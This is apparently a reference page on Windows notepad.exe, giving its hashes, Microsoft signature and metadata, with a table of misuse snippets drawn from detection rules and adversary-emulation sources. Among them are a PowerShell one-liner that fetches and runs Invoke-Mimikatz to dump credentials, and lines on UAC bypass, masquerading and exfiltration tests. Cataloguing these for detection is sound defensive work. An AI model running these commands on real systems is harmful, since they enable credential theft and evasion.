notepad.exe

  • File Path: C:\WINDOWS\SysWOW64\notepad.exe
  • Description: Notepad

Screenshot

notepad.exe

Hashes

Type Hash
MD5 4BD8AC46AEC0C71353FB99E77A1D7C72
SHA1 9C9904C75CF306EF007899E157625E552B8732DF
SHA256 669C3895574BFB3892362C55343661752A472A279C418D67B90015A947D0907C
SHA384 79B212961A2377337E26B48C7FF8B6714328452A30760580CE62A09920A70C7B38255CF821FEDF89BE6B0EE65FB1D5A0
SHA512 BE4E7F27469A8F8F5E1D7F834FB44CD24C5321820AF37933A98788A3806CEBB8218FFF675F1FE6345E84A0D2688A980C55377F174789F6B1F1D2F7C27F0185F6
SSDEEP 3072:vvkpkMXXWG9+lRd1jRizWdxE1ljdbX/TtDfSIwrNxKScPADIjwmyR5X/y7:n6TXXWs+lRd1jRiCdxE1jtDfEE4D+wmo

Signature

  • Status: Signature verified.
  • Serial: 330000023241FB59996DCC4DFF000000000232
  • Thumbprint: FF82BC38E1DA5E596DF374C53E3617F7EDA36B06
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: NOTEPAD.EXE
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.18362.693 (WinBuild.160101.0800)
  • Product Version: 10.0.18362.693
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of notepad.exe being misused. While notepad.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma image_load_susp_image_load.yml - '\notepad.exe' DRL 1.0
sigma net_connection_win_notepad_network_connection.yml title: Notepad Making Network Connection DRL 1.0
sigma net_connection_win_notepad_network_connection.yml description: Detects suspicious network connection by Notepad DRL 1.0
sigma net_connection_win_notepad_network_connection.yml - https://blog.cobaltstrike.com/2013/08/08/why-is-notepad-exe-connecting-to-the-internet/ DRL 1.0
sigma net_connection_win_notepad_network_connection.yml Image\|endswith: '\notepad.exe' DRL 1.0
sigma proc_creation_win_susp_gup.yml description: Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks DRL 1.0
sigma proc_creation_win_susp_gup.yml - '\Users\\*\AppData\Local\Notepad++\updater\GUP.exe' DRL 1.0
sigma proc_creation_win_susp_gup.yml - '\Users\\*\AppData\Roaming\Notepad++\updater\GUP.exe' DRL 1.0
sigma proc_creation_win_susp_gup.yml - '\Program Files\Notepad++\updater\GUP.exe' DRL 1.0
sigma proc_creation_win_susp_gup.yml - '\Program Files (x86)\Notepad++\updater\GUP.exe' DRL 1.0
sigma proc_creation_win_susp_gup.yml - Execution of tools named GUP.exe and located in folders different than Notepad++\updater DRL 1.0
LOLBAS Gpup.yml Description: Execute another command through gpup.exe (Notepad++ binary).  
LOLBAS Gpup.yml - 'C:\Program Files (x86)\Notepad++\updater\gpup.exe '  
LOLBAS Explorer.yml - Command: explorer.exe C:\Windows\System32\notepad.exe  
LOLBAS Forfiles.yml - Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe  
LOLBAS Forfiles.yml Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder.  
LOLBAS Forfiles.yml - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"  
LOLBAS Forfiles.yml Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.  
LOLBAS pester.yml - Command: Pester.bat [/help\|?\|-?\|/?] "$null; notepad"  
LOLBAS pester.yml Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload. Example here executes notepad  
LOLBAS Winrm.yml - Command: 'winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985'  
LOLBAS Winrm.yml - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985'  
LOLBAS Cdb.yml - Command: cdb.exe -cf x64_calc.wds -o notepad.exe  
LOLBAS Dxcap.yml - Command: Dxcap.exe -c C:\Windows\System32\notepad.exe  
LOLBAS Dxcap.yml Description: Launch notepad as a subprocess of Dxcap.exe  
atomic-red-team index.md - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md - Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md ## Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe. MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md Upon successful execution, cscript.exe is renamed as notepad.exe and executed from non-standard path. MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md cmd.exe /c %APPDATA%\notepad.exe /B MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md del /Q /F %APPDATA%\notepad.exe >nul 2>&1 MIT License. © 2018 Red Canary
atomic-red-team T1047.md When the test completes , a new process will be started locally .A notepad application will be started when input is left on default. MIT License. © 2018 Red Canary
atomic-red-team T1047.md | process_to_execute | Name or path of process to execute. | String | notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1047.md The EncodedCommand in this atomic is the following: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe MIT License. © 2018 Red Canary
atomic-red-team T1047.md You should expect to see notepad.exe running after execution of this test. MIT License. © 2018 Red Canary
atomic-red-team T1048.003.md Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout. MIT License. © 2018 Red Canary
atomic-red-team T1048.003.md | input_file | Path to file to be exfiltrated. | Path | C:\Windows\System32\notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1048.003.md Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout. MIT License. © 2018 Red Canary
atomic-red-team T1048.003.md | input_file | Path to file to exfiltrate | Path | C:\Windows\System32\notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1053.005.md This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute “notepad.exe” within MIT License. © 2018 Red Canary
atomic-red-team T1053.005.md Create an scheduled task that executes notepad.exe after user login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. MIT License. © 2018 Red Canary
atomic-red-team T1055.001.md With default arguments, expect to see a MessageBox, with notepad’s icon in taskbar. MIT License. © 2018 Red Canary
atomic-red-team T1055.001.md | process_id | PID of input_arguments | Integer | (Start-Process notepad -PassThru).id| MIT License. © 2018 Red Canary
atomic-red-team T1055.012.md | sponsor_binary_path | Path of the sponsor binary (executable that will host the binary) | String | C:\Windows\System32\notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1055.012.md | spawnto_process_name | Name of the process to spawn | String | notepad| MIT License. © 2018 Red Canary
atomic-red-team T1055.012.md This module executes notepad.exe from within the WINWORD.EXE process MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed. MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md $url=’https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1’;$wshell=New-Object -ComObject WScript.Shell;$reg=’HKCU:\Software\Microsoft\Notepad’;$app=’Notepad’;$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName(‘System.Windows.Forms’);@(@(‘iWindowPosY’,(String).Split(‘}’)[0].Split(‘=’)[5]),@(‘StatusBar’,0))|ForEach{SP $reg (Item Variable:).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:).Value.id-ieq$curpid}|ForEach{(Variable ).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys(‘^o’);Start-Sleep -Milliseconds 500;@($url,(‘ ‘*1000),’~’)|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@(‘^a’,’^c’)|ForEach{$wshell.SendKeys((Item Variable:).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@(‘%f’,’x’)|ForEach{$wshell.SendKeys((Variable ).Value)};If(GPS|?{(Item Variable:).Value.id-ieq$curpid}){@(‘{TAB}’,’~’)|ForEach{$wshell.SendKeys((Item Variable:).Value)} };@(‘iWindowPosDY’,’iWindowPosDX’,’iWindowPosY’,’iWindowPosX’,’StatusBar’)|ForEach{SP $reg (Item Variable:).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr MIT License. © 2018 Red Canary
atomic-red-team T1105.md Upon successful execution the test will open calculator and Notepad executable for 10 seconds. MIT License. © 2018 Red Canary
atomic-red-team T1134.004.md Spawns a notepad.exe process as a child of the current process. MIT License. © 2018 Red Canary
atomic-red-team T1134.004.md Creates a notepad.exe process and then spawns a powershell.exe process as a child of it. MIT License. © 2018 Red Canary
atomic-red-team T1134.004.md | parent_name | Parent process to spoof from | Path | $Env:windir\System32\notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1197.md This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of “svchost.exe” and an Initiating Process Command Line of “svchost.exe -k netsvcs -p -s BITS” MIT License. © 2018 Red Canary
atomic-red-team T1197.md | command_path | Path of command to execute | Path | C:\Windows\system32\notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1202.md “This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe” MIT License. © 2018 Red Canary
atomic-red-team T1202.md forfiles /p c:\windows\system32 /m notepad.exe /c #{process} MIT License. © 2018 Red Canary
atomic-red-team T1202.md | process | Process to execute | String | notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1218.004.md Copy-Item -Path “$([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())InstallUtil.exe” -Destination “$Env:windir\System32\Tasks\notepad.exe” MIT License. © 2018 Red Canary
atomic-red-team T1218.004.md InstallUtilPath = “$Env:windir\System32\Tasks\notepad.exe” MIT License. © 2018 Red Canary
atomic-red-team T1218.004.md Remove-Item -Path “$Env:windir\System32\Tasks\notepad.exe” -ErrorAction Ignore MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed. MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed. MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md | exe_to_launch | Path of the executable to launch | Path | %windir%\System32\notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1546.001.md Change Default File Association From cmd.exe of hta to notepad. MIT License. © 2018 Red Canary
atomic-red-team T1546.001.md Upon successful execution, cmd.exe will change the file association of .hta to notepad.exe. MIT License. © 2018 Red Canary
atomic-red-team T1546.001.md | target_extension_handler | txtfile maps to notepad.exe | Path | txtfile| MIT License. © 2018 Red Canary
atomic-red-team T1546.003.md After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. MIT License. © 2018 Red Canary
atomic-red-team T1546.003.md CommandLineTemplate=”$($Env:SystemRoot)\System32\notepad.exe”;} MIT License. © 2018 Red Canary
atomic-red-team T1546.010.md AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don’t keep getting message boxes showing up. MIT License. © 2018 Red Canary
atomic-red-team T1546.012.md <blockquote>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010) MIT License. © 2018 Red Canary
atomic-red-team T1546.012.md | target_binary | Binary To Attach To | Path | C:\Windows\System32\notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1547.002.md After a reboot, Notepad.exe will be executed as child process of lsass.exe. MIT License. © 2018 Red Canary
atomic-red-team T1548.002.md Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe MIT License. © 2018 Red Canary
atomic-red-team T1548.002.md | command.to.execute | Command to execute | String | cmd.exe /c notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1564.004.md folder to view that the alternate data stream exists. To view the data in the alternate data stream, run “notepad T1564.004_has_ads.txt:adstest.txt” MIT License. © 2018 Red Canary
atomic-red-team T1564.004.md in the %temp% direcotry to view all files with hidden data streams. To view the data in the alternate data stream, run “notepad.exe T1564.004_has_ads_powershell.txt:adstest.txt” in the %temp% folder. MIT License. © 2018 Red Canary
atomic-red-team T1574.002.md - Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary MIT License. © 2018 Red Canary
atomic-red-team T1574.002.md ## Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary MIT License. © 2018 Red Canary
atomic-red-team T1574.002.md GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded. MIT License. © 2018 Red Canary
atomic-red-team T1574.002.md | gup_executable | GUP is an open source signed binary used by Notepad++ for software updates | Path | PathToAtomicsFolder\T1574.002\bin\GUP.exe| MIT License. © 2018 Red Canary
atomic-red-team T1574.012.md Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing notepad.exe with high integrity. MIT License. © 2018 Red Canary
atomic-red-team T1574.012.md the notepad process will not execute with high integrity. MIT License. © 2018 Red Canary
atomic-red-team T1574.012.md level of Event Viewer bypassing UAC and executing notepad.exe with high integrity. If the account used is not a local administrator the profiler DLL will MIT License. © 2018 Red Canary
atomic-red-team T1574.012.md still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity. MIT License. © 2018 Red Canary
signature-base apt_bluetermite_emdivi.yar $s4 = “\NOTEPAD.EXE” fullword ascii CC BY-NC 4.0
signature-base apt_molerats_jul17.yar $s2 = “Notepad++.exe” fullword wide CC BY-NC 4.0
signature-base apt_olympic_destroyer.yar $s3 = “\system32\notepad.exe” fullword wide CC BY-NC 4.0
signature-base apt_poisonivy.yar $s0 = “\notepad.exe” fullword ascii /* score: ‘11.025’ */ CC BY-NC 4.0
signature-base apt_ta17_293A.yar $au2 = “/notepad.png” CC BY-NC 4.0
signature-base apt_wildneutron.yar $n1 = “/c for /L %%i in (1,1,2) DO ping 127.0.0.1 -n 3 & type %%windir%%\notepad.exe > %s & del /f %s” fullword ascii /* PEStudio Blacklist: strings / / score: ‘46.00’ */ CC BY-NC 4.0
signature-base apt_woolengoldfish.yar $s4 = “oShellLink.IconLocation = "notepad.exe, 0"” fullword CC BY-NC 4.0
signature-base crime_ransom_ragna_locker.yar $s2 = “\notepad.exe” fullword wide /* Show ransom note to the victim*/ CC BY-NC 4.0
signature-base gen_cn_hacktools.yar $s14 = “NOTEPAD.EXE result.txt” fullword ascii CC BY-NC 4.0
signature-base gen_powershell_empire.yar $s2 = “$proc = Start-Process -WindowStyle Hidden notepad.exe -PassThru” fullword ascii CC BY-NC 4.0
signature-base thor_inverse_matches.yar description = “Abnormal notepad.exe - typical strings not found in file” CC BY-NC 4.0
signature-base thor_inverse_matches.yar $winxp = “Software\Microsoft\Notepad” wide CC BY-NC 4.0
signature-base thor_inverse_matches.yar $winxp_de = “Software\Microsoft\Notepad” wide CC BY-NC 4.0
signature-base thor_inverse_matches.yar filename == “notepad.exe” CC BY-NC 4.0
stockpile 3796a00b-b11d-4731-b4ca-275a07d83299.yml Start-Process Notepad.exe -NoNewWindow -PassThru -Credential $credential; Apache-2.0

MIT License. Copyright (c) 2020-2021 Strontic.